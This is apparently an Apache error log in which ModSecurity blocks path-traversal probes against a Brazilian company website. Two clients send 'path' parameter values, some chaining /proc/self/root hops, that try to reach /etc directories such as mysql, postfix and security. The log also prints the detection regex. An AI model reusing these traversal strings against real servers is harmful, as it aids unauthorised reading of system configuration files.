[Fri Mar 20 09:18:58.011746 2026] [:error] [pid 31215:tid 140411683178240] [client 74.7.243.128:52510] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07MgF0L0L-SsrnPo54IAAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:59.399039 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.243.128:52514] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07MxCii7xarUs8iHZ3FgAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:02.504046 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:42638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07Nta6ubjKNq_cu4bmcAAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:02.555796 2026] [:error] [pid 11642:tid 140411540502272] [client 216.73.216.191:54448] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07Nrninkcc-iUj5Apt5AAAA5g"]
[Fri Mar 20 09:19:04.080818 2026] [:error] [pid 9818:tid 140411649607424] [client 216.73.216.191:54474] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07N11pVZ5mVmJwsFNBLAAAAEs"]
[Fri Mar 20 09:19:04.117409 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.243.128:42654] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07NwF0L0L-SsrnPo54KgAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:05.392224 2026] [:error] [pid 11167:tid 140411582465792] [client 216.73.216.191:54494] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07OfHIg5MgXLBnicMGqAAAAdM"]
[Fri Mar 20 09:19:05.920127 2026] [:error] [pid 11167:tid 140411599251200] [client 74.7.243.128:42660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07OfHIg5MgXLBnicMGqQAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:07.418966 2026] [:error] [pid 7893:tid 140411691570944] [client 216.73.216.191:54742] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07OxCii7xarUs8iHZ3JQAAAgY"]
[Fri Mar 20 09:19:07.426515 2026] [:error] [pid 10189:tid 140411616036608] [client 216.73.216.191:54744] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07OzJ3M9BSuKP7CAYufwAAAI8"]
[Fri Mar 20 09:19:07.522904 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.243.128:42672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07O_qxLDW4GITHUkT5awAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:10.985605 2026] [:error] [pid 9818:tid 140411683178240] [client 74.7.243.128:42676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07PV1pVZ5mVmJwsFNBPQAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:12.490395 2026] [:error] [pid 11167:tid 140411716749056] [client 216.73.216.191:54974] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07QPHIg5MgXLBnicMGqgAAAcM"]
[Fri Mar 20 09:19:12.511576 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:60728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07QOoXxyEfFpUF8f-QAQAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:14.246984 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:60732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07Qta6ubjKNq_cu4bmgAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:15.942935 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.243.128:60742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07Q_XLqtnMIWvjpaKp7AAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:15.986733 2026] [:error] [pid 15826:tid 140411641214720] [client 216.73.216.191:55160] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07Q-oXxyEfFpUF8f-QBAAAAUw"]
[Fri Mar 20 09:19:16.709789 2026] [mime_magic:error] [pid 7235:tid 140411557287680] (70014)End of file found: [client 57.141.18.88:55252] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:19:16.979894 2026] [:error] [pid 11642:tid 140411590858496] [client 216.73.216.191:55168] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07RLninkcc-iUj5Apt-gAAA5I"]
[Fri Mar 20 09:19:17.582114 2026] [:error] [pid 7235:tid 140411666392832] [client 216.73.216.191:55282] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07RfqxLDW4GITHUkT5gQAAAQk"]
[Fri Mar 20 09:19:17.911094 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.243.128:60746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07RfqxLDW4GITHUkT5gwAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:18.279040 2026] [:error] [pid 15826:tid 140411632822016] [client 216.73.216.191:55334] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07RuoXxyEfFpUF8f-QCgAAAU0"]
[Fri Mar 20 09:19:18.391488 2026] [:error] [pid 11642:tid 140411666392832] [client 216.73.216.191:55340] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07Rrninkcc-iUj5Apt_gAAA4k"]
[Fri Mar 20 09:19:22.379395 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.243.128:60754] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07SvXLqtnMIWvjpaKp8wAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:22.716888 2026] [:error] [pid 7893:tid 140411599251200] [client 216.73.216.191:55596] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07ShCii7xarUs8iHZ3NgAAAhE"]
[Fri Mar 20 09:19:22.855484 2026] [:error] [pid 21219:tid 140411658000128] [client 216.73.216.191:55534] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07SvXLqtnMIWvjpaKp9AAAAoo"]
